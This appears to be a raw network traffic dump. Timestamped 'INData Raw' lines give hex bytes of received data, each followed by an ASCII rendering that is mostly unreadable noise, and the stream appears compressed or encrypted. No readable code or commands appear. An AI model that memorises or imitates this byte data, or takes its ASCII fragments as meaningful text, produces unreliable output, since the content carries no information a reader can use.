                                                                                                                                                2022-09-29 12:51:58 UTC35481INData Raw: 7a 8b 77 25 20 f8 33 7c 32 6b f9 c7 fa 5a ba 56 4a 04 2b 34 0d 85 58 29 61 1a 4f cf 3d 5e 01 fa 2d 91 b8 de 8a bf bd 4e 7b 3f 4b f8 2c 52 ac 13 2e b7 28 1e dd 23 9c 11 ca 98 91 48 1a a6 72 28 1b db cd 35 36 52 49 10 be 68 a6 2c 53 ff ac e8 73 db df 98 4d 40 c3 2f 08 8d d3 29 c7 0b 62 c2 10 5d 61 e3 64 54 9d dd ed c7 2f 00 29 ba b8 58 55 22 6f 6d 7e e7 72 b0 1d 0f 20 4b dc 93 23 3f 42 98 33 cc 77 e9 c6 1a 6a 7b ca 2d 4e d5 6e 86 90 b7 2e d0 b4 c1 27 bc 59 dc e4 9e 99 27 14 de d4 33 2f d7 2c b7 4f 07 08 6b ff ae 9b bc 3f 36 51 5f 6a 1b ba 6c 90 b5 65 73 3a 08 fb c8 32 2b ab 05 9a e9 d4 fe 82 18 8a 73 66 d6 2c e9 88 78 4e 64 c1 00 04 e7 60 89 c8 b8 ae 3f 91 aa 23 d3 f3 d1 02 09 58 8d 31 97 8e 3f 9a 1c 57 d9 ba b0 3e aa 41 94 78 50 68 a2 1d ad bd ac b9 eb 1d
                                                                                                                                                Data Ascii: zw% 3|2kZVJ+4X)aO=^-N{?K,R.(#Hr(56RIh,SsM@/)b]adT/)XU"om~r K#?B3wj{-Nn.'Y'3/,Ok?6Q_jles:2+sf,xNd`?#X1?W>AxPh
                                                                                                                                                2022-09-29 12:51:58 UTC35497INData Raw: bc bb 72 6d e1 03 bc 11 8b 8b 26 3e 35 ba f9 2b cb 93 60 00 96 b5 33 e4 11 79 0a c0 1e eb 1a e3 7f d5 39 38 2e 5a fe b2 8b be a3 38 b6 77 63 eb 82 9e 04 70 4f 43 de e1 c6 d9 af 92 d4 2c 10 58 7b 76 71 6a 00 41 92 75 cb 28 3d e6 b2 9a 1b 74 23 04 04 41 4b bc 35 7e 3b d7 16 ee 5f cb e7 f5 06 15 e6 32 23 f4 40 38 1d 64 3a 61 42 0b 44 21 91 1b 73 36 06 85 f6 c7 d4 b2 38 eb 3c 28 2a 88 50 58 32 bb f5 33 2a 96 d6 c7 44 3c 6d fb e9 3c 20 53 d0 b6 d7 ac ff 9c 24 5e c9 d1 52 02 d8 d2 83 e2 95 fe be 5f 74 9f 12 84 a1 0d e5 33 4a f9 41 d0 95 e3 d5 75 98 05 e5 20 49 f3 fe 09 95 bf 1b 13 cd 77 38 6c f3 f5 2d 90 ed ca 91 2c d6 74 f8 29 52 92 6a a1 c6 8c af 3a bc 83 84 a7 77 d9 5b 3c bb 1f 79 f2 a0 87 64 e0 90 1f 04 a8 72 b8 5d d2 48 e6 af 24 a8 39 15 0d b6 49 a5 1b c3
                                                                                                                                                Data Ascii: rm&>5+`3y98.Z8wcpOC,X{vqjAu(=t#AK5~;_2#@8d:aBD!s68<(*PX23*D<m< S$^R_t3JAu Iw8l-,t)Rj:w[<ydr]H$9I
                                                                                                                                                2022-09-29 12:51:58 UTC35513INData Raw: d3 bb 47 5a be 4f e6 bb b8 14 3f 87 2d a6 5e 8a 16 71 58 45 22 e1 85 d2 9e 53 eb cd fb 38 9e 73 ff 69 d8 93 ea de 9d 0f ac 2b fe b5 82 ef 7d 4e 90 5c 53 f7 cf e8 c4 fc 6c 99 88 b4 56 86 ab b0 e2 b1 a8 f2 31 51 06 a0 87 3e b9 52 ec 6d fd 62 c7 9b 1b c1 9a 4f cf e8 0b 20 87 ba e9 7e 9c cd 25 8c 16 ca 5c f8 3e 9a ff 5d 7a a4 77 d2 66 d0 08 e1 c1 81 8a c1 81 8e c0 7c 41 c6 7a a6 76 b9 20 ae 37 68 96 24 6a 7b 3e 8d d6 25 a6 3f 10 0b 6e 4b 16 fa e1 3e 62 3c 84 a3 c4 88 3f a8 7d fb 1d 76 cc c5 66 c5 5d 20 6e 01 6b 04 ba 5b aa d6 8f a4 7d 51 05 b9 7f 28 bc b9 9a f4 d1 cf 77 f9 8f 2b c4 01 ae 29 ba 77 95 33 aa 18 70 f2 07 c5 07 00 3f 32 13 2c 33 9e 08 eb 47 e4 9e b5 c8 f4 29 1b ea b7 d1 94 d3 6c 58 51 2f 1a 87 6b 29 f5 27 f9 2c 7b 3d ed 40 28 d3 44 e3 38 69 85 1f
                                                                                                                                                Data Ascii: GZO?-^qXE"S8si+}N\SlV1Q>RmbO ~%\>]zwf|Azv 7h$j{>%?nK>b<?}vf] nk[}Q(w+)w3p?2,3G)lXQ/k)',{=@(D8i
                                                                                                                                                2022-09-29 12:51:58 UTC35529INData Raw: c5 d9 7c 97 fd 3a b0 f3 b2 72 ac cb 63 0a 7b fb db 6e c8 03 56 50 f9 86 07 38 45 48 24 16 23 af ac 5a 57 0d 23 f9 bd 67 e5 24 01 cf 24 34 5b f4 ab dd 10 6b 69 16 03 ea bb 55 ef 83 ba 28 8b 78 b9 34 70 0e 50 06 75 02 9d 6a 02 5c 78 ff d1 70 35 51 0c 38 c6 3e c8 9b 2e fd 7e 02 7d 0d 6d 2d 8b 9f 26 07 28 8e 12 94 f8 74 43 4e 13 32 65 fe 22 6d 28 a7 c1 73 bd d1 59 55 bf 9a 09 84 6b 1c 17 9b 29 df 6a c7 db 2d d0 da d8 31 a0 d6 6b be 27 f2 7d 89 15 3a f5 40 d0 78 28 07 0b 5b 65 51 12 70 fe d6 e5 2d e4 91 00 1e 4c 48 d5 2e 22 26 99 b2 34 be 69 bd a5 0f 83 90 c8 15 a0 6d fd 30 7e 9f 18 d2 b5 d7 c6 ca 26 74 8d aa 9d 25 e4 31 8e 70 07 9a 26 59 c1 c1 e6 5e 92 f2 54 6a f6 1f b2 99 b0 e8 a4 0b 6a c4 06 fe 7b 5b 89 f3 18 75 24 89 a3 9d 26 51 db 44 d2 d6 c0 c8 f4 a5 9f
                                                                                                                                                Data Ascii: |:rc{nVP8EH$#ZW#g$$4[kiU(x4pPuj\xp5Q8>.~}m-&(tCN2e"m(sYUk)j-1k'}:@x([eQp-LH."&4im0~&t%1p&Y^Tjj{[u$&QD
                                                                                                                                                2022-09-29 12:51:58 UTC35545INData Raw: 97 fe f7 cc 9b a1 bc 2d 39 49 a8 40 c1 c0 e0 54 05 bc 78 2f 4b 20 34 cb a9 89 1f 37 1d 54 93 a4 f3 73 55 27 be 35 5e f8 2e 78 a8 f1 29 4c 4a 0e 50 77 56 b0 91 d0 8a 77 a1 ac 54 32 66 1c ab 9f 8b 7e 63 70 5c 90 55 a6 7a 1a eb c0 ce db de a0 53 10 e9 87 43 f2 91 db 5e ee ee e8 ea fc f4 db b6 ea ea a0 48 06 f1 40 b1 e0 5d 67 aa 28 6a 73 19 2d 38 2f 7f a8 8c 16 1f 83 8c 3d 5e 48 46 fa e3 f9 31 74 0e 69 98 98 59 a0 0a 51 8d 40 0d ff a1 5d 89 9f b4 9b d5 67 26 71 61 97 c7 f3 1e 5a 94 c9 bc 6f 23 87 51 41 4e c7 1d cf 35 f2 6a 88 14 fc a5 ba c1 73 99 45 b8 20 03 d3 de ad a2 e6 18 04 94 a7 74 b8 75 b1 79 f2 02 a0 6d 52 64 51 41 d0 ca de 98 74 3a cf ec 72 bb 44 66 74 4a 3c 68 b1 f6 29 bb cc 12 0d fb 0c 8f 7a b3 03 aa 92 6e 16 98 a6 03 c0 24 c9 33 a4 f6 37 d0 32 a4
                                                                                                                                                Data Ascii: -9I@Tx/K 47TsU'5^.x)LJPwVwT2f~cp\UzSC^H@]g(js-8/=^HF1tiYQ@]g&qaZo#QAN5jsE tuymRdQAt:rDftJ<h)zn$372
                                                                                                                                                2022-09-29 12:51:58 UTC35561INData Raw: 24 2c 7b d7 00 82 86 aa 73 77 fc 55 9b c1 b2 b3 75 ce 09 ad 66 5e fd e5 58 3e ca b1 80 ab 14 e7 6e 5b 49 f2 f2 70 04 57 0f 7d 43 f4 63 c6 15 26 47 ef cc 47 a9 63 c2 c3 02 9a 79 a0 d0 c9 88 13 65 4e 56 d7 74 ff f7 1a e8 91 31 0f c8 61 66 84 c7 57 13 cd 90 d1 7c 1b eb b1 8e 17 27 79 4f 5e 21 1a a1 f2 4b fb fc 48 49 79 01 ed 09 6a e4 ae d3 1b 83 9e 2d 43 91 a5 f4 6d 9c 64 0f 3c d0 41 b6 a8 0c 3f 2a 71 5b 83 0a 57 ff c5 95 59 1c 9e 7b 37 32 4c d8 90 0d a1 97 b7 db b7 a8 07 12 ee 43 52 35 3c 37 2a 33 9b 7e 5a a3 77 08 aa f0 4f e4 58 a1 29 2d c5 46 49 ff a1 0d 65 c7 25 83 63 a0 b6 bf 94 14 e0 fc c9 22 1b e6 4e 87 67 65 7d 0d d2 7a 92 d0 b2 11 9f ba ea 79 70 2f 30 10 8c 44 8e 64 64 b1 f8 ae 5c f1 98 c6 ab bb 19 1c 56 b6 c5 65 60 24 34 18 fd 73 d9 54 27 9c cb 64
                                                                                                                                                Data Ascii: $,{swUuf^X>n[IpW}Cc&GGcyeNVt1afW|'yO^!KHIyj-Cmd<A?*q[WY{72LCR5<7*3~ZwOX)-FIe%c"Nge}zyp/0Ddd\Ve`$4sT'd
                                                                                                                                                2022-09-29 12:51:58 UTC35577INData Raw: c8 62 c5 f0 0e 68 41 df 9c 4e 83 56 cc 89 82 ef 66 a3 af f2 f3 7f 7a ca c8 b6 1d 39 12 0e 40 90 80 6d 2c ed dc b6 4a e1 88 7a 08 cc a7 6f 3f 56 64 18 36 65 a1 8c 00 05 20 91 2a 09 33 bd 94 12 cd 47 e3 aa fc 13 a4 7d fe 77 dd 26 da b0 fa 31 c2 15 58 a2 6a 3b 6b 02 c4 3e f0 d6 5a bc 5b 15 5a e1 e6 4b 5e f6 56 67 07 7c 73 26 e7 1b 57 24 b6 b3 8b 34 b3 55 10 37 d9 5d 27 50 d9 4c a2 cc 47 66 fa c1 d4 14 03 1c 65 54 0c 59 1b 30 8b 50 f3 2b 06 d7 53 c8 fa 5b 5d 2a e1 6a 25 db 4a 4a de 30 9a d6 df fa 5b b2 0a 30 79 f8 02 fe 42 9f 28 57 52 06 e5 13 5a 76 4f 95 83 17 1f f6 38 e8 7d de 92 5f c4 31 69 5f 01 40 0f 8d 79 db cb 7a ca ac 30 7e 12 d1 08 7a 80 54 51 c8 46 3a 9c 48 20 c4 06 f7 d4 6b 31 c9 01 fc 23 bf 57 49 ee 65 25 7f bc 10 e5 65 6b 80 01 73 a2 af 28 2e 78
                                                                                                                                                Data Ascii: bhANVfz9@m,Jzo?Vd6e *3G}w&1Xj;k>Z[ZK^Vg|s&W$4U7]'PLGfeTY0P+S[]*j%JJ0[0yB(WRZvO8}_1i_@yz0~zTQF:H k1#WIe%eks(.x
                                                                                                                                                2022-09-29 12:51:58 UTC35593INData Raw: ac 67 57 43 00 ab f2 b0 10 39 35 94 00 63 2f d1 03 f1 bc ca 43 d7 b2 38 72 7e 66 bf 87 33 1d a4 67 87 c1 da 09 84 6e 56 26 66 63 c1 be b7 4b 9d 71 89 cb 31 b7 eb 23 e3 01 38 c9 80 ae 74 36 2e 10 db 43 a6 ae 00 51 7a ee 0e b1 5f 36 0c 4e 5d 8f de 1e a6 fa 4f e7 c9 ec 27 4a 1f a2 58 a3 f0 44 26 ed b4 f5 cf 27 44 a4 92 bd 90 ba 3c 1b 47 7f 9f e9 5c 36 97 7e 78 21 be 1a dc f8 3a f8 ba 90 41 18 ca 31 5d 1f 31 ce 52 0f f2 52 6e 8c 06 1a 77 c0 5d 3f 24 34 ee 50 6d 15 78 54 0a a4 f4 93 1e ca 50 ce 82 74 1e bb 7f c8 30 1e 82 b2 f4 2a ee b7 f7 3a 36 87 a0 d5 87 f1 1a 14 f7 27 9f 93 47 7c 28 56 29 24 65 6e 19 bf 88 33 58 7f 72 5a a6 6e 78 9c fc c3 35 ed a0 3f e6 7e 16 71 ef 03 ca 76 21 86 8f 2f 66 20 85 02 0b 62 c7 c5 5a ce 0b f8 6c d2 db 21 c0 ef d1 85 ee 8f 7a d1
                                                                                                                                                Data Ascii: gWC95c/C8r~f3gnV&fcKq1#8t6.CQz_6N]O'JXD&'D<G\6~x!:A1]1RRnw]?$4PmxTPt0*:6'G|(V)$en3XrZnx5?~qv!/f bZl!z
                                                                                                                                                2022-09-29 12:51:58 UTC35609INData Raw: 8e 0a 23 91 88 7d 85 c6 54 93 0f 58 d4 81 74 15 50 32 a9 0a f9 d7 eb b4 26 ba ba 55 f7 a5 da e8 36 b0 ba cc 0c 1e 05 1b 94 24 98 85 7a 14 58 78 33 17 e7 fb 90 d4 2f 5a 8d 7e ed 65 b3 03 8e 6e 14 30 2e e3 f9 c3 2f 39 5f 5d bc 06 7e 0c 70 5c df a1 6d 32 20 f9 bf 84 ae 6b 07 06 a2 65 bb c0 53 ba 8a 4d ba 27 03 0b 3e 4a be f5 0e 74 99 2b 71 20 53 86 50 b7 24 bd 56 5b 3e b6 79 07 0b 5f 30 52 11 b8 0a 44 9f f0 04 e2 90 2e 06 a1 94 27 3e 01 d0 7d 19 41 c9 c5 a5 e9 b9 39 84 97 25 10 8d 56 4d 69 00 9d d7 b9 08 9a e1 1c ae f4 9e ca d0 fe a2 f8 20 57 71 0e 19 ea 18 ac ff 9b 4a 93 91 b0 28 1e 66 02 94 af 7d 27 a8 ed a0 86 02 b9 39 8d 3b 25 38 c6 a7 62 6e 08 e0 14 8b 9d 49 3d 68 a3 5e 42 1e 28 76 12 16 fb 68 8f f8 7f 03 0f 13 ce 00 91 55 7b 7e e7 6f 07 c5 93 c0 1d 2c
                                                                                                                                                Data Ascii: #}TXtP2&U6$zXx3/Z~en0./9_]~p\m2 keSM'>Jt+q SP$V[>y_0RD.'>}A9%VMi WqJ(f}'9;%8bnI=h^B(vhU{~o,
                                                                                                                                                2022-09-29 12:51:58 UTC35625INData Raw: c5 cb f1 72 55 c5 6e 79 cf 3d aa 48 88 fe 30 7a 49 98 fe 5d eb 4f c2 a6 86 ad 73 60 d8 10 21 f8 69 ee d0 13 f7 f4 23 69 43 c5 09 0e 01 95 36 36 e7 a0 c5 79 08 94 45 b4 a6 d0 a3 1b 75 6b 01 32 9c e0 00 02 a4 b9 9c bd 97 6c b1 52 f2 50 02 d3 d7 92 d6 b2 e6 78 f4 50 b8 bc 7e fa dd 9f 25 fd 22 ee a2 d8 f1 e8 ad df 8a f1 c7 45 0e 3b b9 a2 54 14 d5 6b b6 2d ed e7 97 37 04 80 bc 5f 6f d1 0f 32 60 45 67 c2 51 0b 93 20 9e 21 4e 86 d8 5e a8 fa c0 a1 0c 28 90 da 7b 8c 24 cc 07 e9 76 d9 3c 63 14 49 83 35 49 05 bd 8c b5 85 b9 a1 6e 2e 21 36 13 f9 28 01 a2 ef 6f 63 24 5e 77 89 2d f7 12 9f 5f 4f 10 5e 1a ba 49 b2 2b 23 b1 2a e4 59 14 b3 86 bb 53 a8 48 d3 c0 03 a1 4a 91 5c 02 2d 22 58 d5 7a 6c 35 14 a6 0f 2d 35 d2 05 1b fe 11 48 9b 62 7a 77 4f 6a 23 54 c0 f0 4e 58 e9 7e
                                                                                                                                                Data Ascii: rUny=H0zI]Os`!i#iC66yEuk2lRPxP~%"E;Tk-7_o2`EgQ !N^({$v<cI5In.!6(oc$^w-_O^I+#*YSHJ\-"Xzl5-5HbzwOj#TNX~
                                                                                                                                                2022-09-29 12:51:58 UTC35641INData Raw: 5d 8d 09 0e 5d 2b 72 b2 a1 5f 9d 79 3d 7d 98 7f c4 f4 d8 5f 1e 07 5e 56 07 4f 44 2f cc 82 f9 22 22 0f 0f cf ee 2f 19 54 aa 3b f6 66 7c 31 4c aa 9d 58 e1 5d c9 be 07 16 57 3f 94 85 23 1e 8b 10 48 33 b7 1c 29 d5 e4 03 70 e8 ba 36 90 42 a5 03 88 cf 5e c8 4b bd 46 5f 8f 0c 7a 00 ab bb 56 c7 9c 3e 36 c6 22 99 03 82 4a ec 18 47 f0 32 d7 76 7d e0 bb f8 cf fb c7 8e af 7d 4d 24 68 3a 8e 4d 1a 7d 7f b3 9e 4b d8 e8 f5 07 56 39 6b ed 40 f0 da be fa 48 74 9c 8a 53 78 bc f8 38 28 e5 c8 8c 86 69 52 69 5d 62 c1 a5 70 d9 9a ec b4 43 f3 8d 4b b7 d6 2e df 62 e0 4d 0a 06 29 09 9c 92 d7 d6 ac 8f ce 2b 26 a1 ee 35 cf da 8d bb 86 22 a7 4a 60 42 13 54 05 1a 04 f4 5b c3 69 61 dd 01 0b fe 03 45 5e 86 64 7d 10 93 10 fc d0 e6 ec 49 18 11 f5 be 48 d5 ff 1b 27 ee b2 77 89 bb 3b 65 c1
                                                                                                                                                Data Ascii: ]]+r_y=}_^VOD/""/T;f|1LX]W?#H3)p6B^KF_zV>6"JG2v}}M$h:M}KV9k@HtSx8(iRi]bpCK.bM)+&5"J`BT[iaE^d}IH'w;e
                                                                                                                                                2022-09-29 12:51:58 UTC35657INData Raw: ca 67 8b 8d de a0 a4 f0 02 66 7a ad 94 db ae b2 61 56 c2 71 cf 5d ae 9e d7 4a 20 ad b1 ff ea 36 d5 10 7f 7d 7f 4b 2a 1d c0 60 a9 5e 5c 9d 8f 13 bb 22 51 2a e5 d8 eb 83 e2 f5 ec 32 51 6d cd c3 50 d8 01 c4 6e c9 a4 46 a1 67 14 42 fc d9 22 fc da 64 91 fa df 4b d7 2f 2d bd 7c fd 74 4c df c8 3e 2b 9d 8e 99 65 5c 70 f0 9e a0 66 d5 da 0d 80 d7 ba 24 ac b2 65 10 72 c8 8f 40 34 75 f4 5f 66 76 48 22 48 8b 4f 2a 09 54 bb 4d f9 f9 3b 8f e4 78 c9 28 d5 df d3 45 a8 34 5b ef 3c 7b bd af e6 50 16 55 92 03 59 ed 12 57 9e d2 b0 9a af 62 75 0e de 0f 5a 91 a7 52 d8 4c 04 ad 67 31 18 84 99 57 d6 a9 16 6a 83 ba 9f 85 f4 b7 74 e1 35 b4 72 32 4b 34 8c 06 ea 25 46 7c 52 a6 49 0e c5 56 9a a1 c9 c5 4c 79 77 da 1f 1c 24 c3 41 23 ac d4 90 ae b1 85 f8 59 a7 cc 68 a5 f1 73 33 c3 a3 73
                                                                                                                                                Data Ascii: gfzaVq]J 6}K*`^\"Q*2QmPnFgB"dK/-|tL>+e\pf$er@4u_fvH"HO*TM;x(E4[<{PUYWbuZRLg1Wjt5r2K4%F|RIVLyw$A#Yhs3s
                                                                                                                                                2022-09-29 12:51:58 UTC35666INData Raw: db e3 09 55 50 58 8e 45 49 1d b4 eb b0 7f 92 d6 2b e7 6b d6 10 22 6a 7a 9c 47 75 f2 61 6d e2 14 0a 94 02 eb 0d 7b e7 fe bd d6 6c 5e 27 6e ed a3 31 63 aa be c0 43 f5 ee d9 01 9c ce b8 3f 2c a4 b7 eb b9 ec 02 62 6f 9b 48 4a 1d 7c 24 8b 43 06 97 52 53 b6 dc c7 04 80 0e 0a 42 b6 9a 51 bc 9e b3 e3 e9 6f 7e ef 56 14 aa 44 cc c7 cc 5e 39 b4 99 7c 50 f8 a0 89 a1 96 ed 96 85 29 77 c1 75 57 f7 f6 75 a8 36 90 43 25 ae 7c 1c 98 e9 9c 03 4b 0d 61 b0 4a 8c 01 60 a8 b5 04 78 ed 2d 2d 9f 1c 8b f3 7d 99 8d 59 ca 1e b8 d7 ae f2 9b 87 07 d4 4a d6 93 05 85 54 6e 6b db 2d 19 44 56 0f f4 38 f3 be ad fc 2f 7d c1 fa b9 47 09 54 6b 1a 9f 06 b3 fc cb 17 bd ab 15 54 45 b4 b2 80 23 87 2d e3 e8 97 f6 0a 39 31 32 00 57 b5 42 40 ec 88 31 c9 b0 65 e9 39 16 e8 e8 34 1e 0c 3b 17 d6 e4 44
                                                                                                                                                Data Ascii: UPXEI+k"jzGuam{l^'n1cC?,boHJ|$CRSBQo~VD^9|P)wuWu6C%|KaJ`x--}YJTnk-DV8/}GTkTE#-912WB@1e94;D
                                                                                                                                                2022-09-29 12:51:58 UTC35682INData Raw: b8 00 ad 07 56 a4 9a ba fd 72 5c df 13 04 72 3d a4 75 0a bf b3 f5 46 fe 1c 5b d2 cf 90 40 53 89 d5 b2 6d 5f 69 bf c5 33 c9 00 49 6e 91 56 c9 d9 73 bf 5e 60 81 0a 77 6e cb 38 f2 38 9c 95 a9 d5 9e 9e 9f 88 75 94 a6 b1 1d 19 47 ea c6 46 83 9f 1d 34 3d 05 f4 82 87 5b a8 e3 e6 1e 99 2b 17 91 84 e1 cf fa 11 69 5a f2 51 9c 12 55 f6 1e 5e 44 d2 02 d5 a1 21 36 cd 63 46 59 f3 4f fe 00 06 5b 78 37 4b 7a 8e f5 87 49 2d 28 9f ab 0f 98 5e c0 59 ad 10 9a 38 33 5f 8e 74 c9 f2 56 d2 d9 5a 53 3b 5a c7 af 57 e4 0b 9c 73 80 e1 b3 90 b5 01 5d 77 26 b9 61 fa 20 0d 74 47 0a 2f 8b fd 02 83 c7 82 b3 9f df e4 35 39 6e 63 b5 89 cc a4 a8 f3 fe 7b 64 cb d0 4e 58 60 a9 07 b0 8a 68 b4 33 9f c8 9d ce 99 a4 f2 a9 e4 91 36 2b f7 2c 71 c4 6d 9d 4c ee 64 b3 1f 8d 94 64 9f e6 e0 90 f9 5f 9b
                                                                                                                                                Data Ascii: Vr\r=uF[@Sm_i3InVs^`wn88uGF4=[+iZQU^D!6cFYO[x7KzI-(^Y83_tVZS;ZWs]w&a tG/59nc{dNX`h36+,qmLdd_
                                                                                                                                                2022-09-29 12:51:58 UTC35698INData Raw: 73 39 40 f2 23 38 f7 91 31 9d fa b1 5f 92 c8 a8 a2 b8 ad 29 bc 89 df c4 f0 cd 7c 94 7e 6c 1c c8 4b 11 72 ac b8 21 d3 3a d7 05 06 6f 2c 2b 8f c6 f4 26 67 d6 98 12 26 5d 27 9c 0f b0 a2 47 06 7c d2 71 e1 9f 07 ca e6 6d 07 da 37 84 d6 dc 19 e9 50 35 6c 48 56 ac 61 39 2b b5 95 b5 aa 42 07 de 4b 69 37 5f 35 23 09 58 57 ab 88 c3 7a c2 50 5a 4b 17 32 e4 9b a0 bd 14 46 79 b6 04 1f 28 e3 df 4e 37 b2 ff 42 66 bb cd 6e 63 22 3c 24 d2 d7 a7 75 6a 75 6a fc 22 3f af 90 0e f3 19 4a ad 91 ae 95 d6 0c f6 7d c4 b3 e4 9d b2 2a 8a 74 01 92 16 93 3a 32 8b 4a 58 56 a7 e9 cf eb 80 54 34 93 64 5e de c0 e6 68 eb 68 8c b7 81 89 ba 50 06 eb 52 1a b9 d9 67 fa 3a ba c1 13 6b 29 77 73 2c 4c 10 68 11 aa 78 04 7d f3 ef 40 ab 68 77 ac 24 ff f6 96 87 e2 85 bc bb 4a f5 d0 82 c4 30 72 67 69
                                                                                                                                                Data Ascii: s9@#81_)|~lKr!:o,+&g&]'G|qm7P5lHVa9+BKi7_5#XWzPZK2Fy(N7Bfnc"<$ujuj"?J}*t:2JXVT4d^hhPRg:k)ws,Lhx}@hw$J0rgi
                                                                                                                                                2022-09-29 12:51:58 UTC35714INData Raw: 06 85 3a 64 96 19 9d af b8 10 85 4b 38 db 36 31 b3 7e 1b fa 36 1b bb af 36 44 d6 43 bb 99 bc c3 65 af 04 78 1f d4 7b d9 5c f1 d6 e9 5e 7a bf dd 2d bd 6d d6 f3 cb 14 1e ca 6a 81 b6 29 91 04 b0 32 b0 8e 64 91 e8 de 3b 6f 34 c4 42 37 4b a5 8f ab f3 0b ac c5 d9 5c be 89 3c b1 d9 56 c3 40 02 f5 bb 17 6a 3d 79 90 1e 19 c3 6f 5b 6e f9 2b 7e cf f6 99 41 40 85 f1 53 5f e0 f6 31 b4 69 6a 6b 3f d1 55 55 17 c0 d6 e9 6a bb 5e b3 b7 58 0b 92 59 0d 33 79 c6 77 b3 5e bc 50 2a e1 06 16 1c ca 29 23 59 1a 64 54 fb f3 29 59 86 ea 94 f0 b7 21 28 a7 51 dd 96 57 3a 1b cc 6b 02 c1 7b 5f 13 6f 46 11 2d 44 dd 6f fd 95 5e 3a 97 bd 7d cb 4b 20 1f 60 86 c0 aa c1 b8 a8 0e 1b bc 18 00 36 8b 55 d5 6f 34 49 83 95 20 a8 15 7c 6d 94 96 d7 46 74 8b 66 68 82 ff a8 e4 6f 9e b2 f0 83 6a e9 7a
                                                                                                                                                Data Ascii: :dK861~66DCex{\^z-mj)2d;o4B7K\<V@j=yo[n+~A@S_1ijk?UUj^XY3yw^P*)#YdT)Y!(QW:k{_oF-Do^:}K `6Uo4I |mFtfhojz
                                                                                                                                                2022-09-29 12:51:58 UTC35730INData Raw: 56 74 e0 53 88 8d e5 69 07 6b cd 05 da a4 73 03 10 2b 46 a4 64 bd 04 08 d1 d8 bc 30 a7 03 c3 d6 18 df b3 6c 17 e5 ae b7 c8 be 17 80 6a fb 20 27 1e 4f 6b 71 92 90 1f d1 a7 da 18 6b fd 07 1d 83 f5 d8 9d ee 68 1c f6 75 5e 37 d4 ce 34 4a 46 e0 49 14 3c cf 07 d0 36 63 ca 0c 7c 13 cc 2c 88 7b 1e 93 d3 da f9 d1 7b b3 15 2f 43 d4 9a ac 8b 9a 7c 1c 50 f1 a5 ce fe 8e 68 2a fe 77 37 29 f4 a9 5b 2a 00 bf df 23 77 8f 12 fa 5f 7d 79 c4 74 5e be 47 f0 d5 ba ad 4f 12 9e f8 59 51 05 cc 66 61 75 3c cd ef ce df 6b 3a fd b1 e2 2c 97 42 07 5b f8 0f 4c 5f f1 3e 4d 9a 0c d7 f8 55 7c bc 8e eb ea d6 ae de 27 d7 6f 06 24 5f 45 45 e2 e3 2d 8d c3 db a6 ca 97 d8 15 02 46 e4 5a e3 62 a1 a8 64 1b 49 87 8e e4 6f 4a 3e 9a 92 29 3a 53 1a 7b 78 6f eb 8f 84 3a c6 aa a6 ee cb 99 b2 b4 09 3d
                                                                                                                                                Data Ascii: VtSiks+Fd0lj 'Okqkhu^74JFI<6c|,{{/C|Ph*w7)[*#w_}yt^GOYQfau<k:,B[L_>MU|'o$_EE-FZbdIoJ>):S{xo:=
                                                                                                                                                2022-09-29 12:51:58 UTC35746INData Raw: 6b df 7b ee b0 88 7d 0b 03 8f bc 4a 7c 2b 81 79 00 82 ee 41 9d a2 85 06 59 96 b3 b6 35 e3 34 63 d6 ee 77 4a eb 0b 7e 68 07 79 f9 03 c5 4f 0f 01 74 bc 4e 6d 19 8f 86 34 cc 22 34 61 d1 5b 6d fa af 56 63 a5 b9 d6 9a db a1 a7 4f 7a f1 b9 1e 4d f6 79 35 5c d4 8b 82 64 2e 9b be 9a 81 73 e7 22 46 cd bb 9e 8f d5 ed 49 32 7c e0 8c 5f e2 c3 fb 18 83 54 95 4d de 47 3e b5 0b 9c e1 83 a8 4d 59 df 50 d6 ae aa 6c c8 04 42 e8 e4 9e 99 c4 7d e6 85 97 1e a9 be 76 a0 c3 bd 66 cf 1c 6f a0 23 af 3e 86 19 66 eb a3 e8 44 9f 68 f4 36 c8 71 3b c8 5a b1 c6 48 37 3d ce c3 f4 78 aa 0b 4a 86 6a 7e 14 50 4b cb 19 08 1d 12 a3 57 60 60 cb 73 4f 6d 73 2e 47 86 f9 9e 40 c7 95 f2 5f fe 7f 38 ba ef 1d b4 63 03 c7 c5 16 3c fb 22 66 18 3f 11 c0 c7 c2 34 89 5f bb 79 c6 84 e7 03 a7 22 c7 ef 90
                                                                                                                                                Data Ascii: k{}J|+yAY54cwJ~hyOtNm4"4a[mVcOzMy5\d.s"FI2|_TMG>MYPlB}vfo#>fDh6q;ZH7=xJj~PKW``sOms.G@_8c<"f?4_y"
                                                                                                                                                2022-09-29 12:51:58 UTC35762INData Raw: 6f 11 5e c8 9a e3 cb da c6 58 3b 31 7c d3 43 6c ed d2 47 46 f2 c5 36 82 83 c6 b8 f6 36 77 6a ed 49 fa ef 23 57 f0 3c 8d f4 7c 84 e8 68 e6 d1 87 93 6c 32 f3 11 3c dc 88 b4 fb 87 b7 8d c0 71 98 b9 e9 21 36 49 10 9a e2 34 82 b6 2e 2e 1f 17 ac 97 a2 6e 0e 38 79 7d 9d 26 0d a7 79 88 27 4e e5 2a 17 c9 22 3a b6 9d f2 29 e6 c3 3b aa 72 53 1d 43 02 6a d2 48 fd 5a b1 23 a5 cb 08 d3 1a 89 40 d3 87 02 7f ba 49 fd 4c 1b 17 5a 23 22 84 66 78 04 c2 9c 2b 11 0b 09 d4 92 f5 cb 4c be 4a 93 43 46 b9 a5 27 d7 f2 04 47 98 e5 e5 da ae 4c 59 db bb 4a 1b 60 e0 33 92 e8 e4 71 0c ae c1 80 b5 57 c8 56 ba ac 06 c6 26 f7 d1 35 f5 40 5e 6d 94 ee a3 e8 f8 c6 57 ad 36 bc 38 42 4b 19 9a a9 b7 22 ec 96 1d 09 24 9d fc de 39 e4 13 e8 93 56 1e 9b a4 d3 a3 78 5e a9 3d 75 59 7b d6 ca 82 62 dc
                                                                                                                                                Data Ascii: o^X;1|ClGF66wjI#W<|hl2<q!6I4..n8y}&y'N*":);rSCjHZ#@ILZ#"fx+LJCF'GLYJ`3qWV&5@^mW68BK"$9Vx^=uY{b
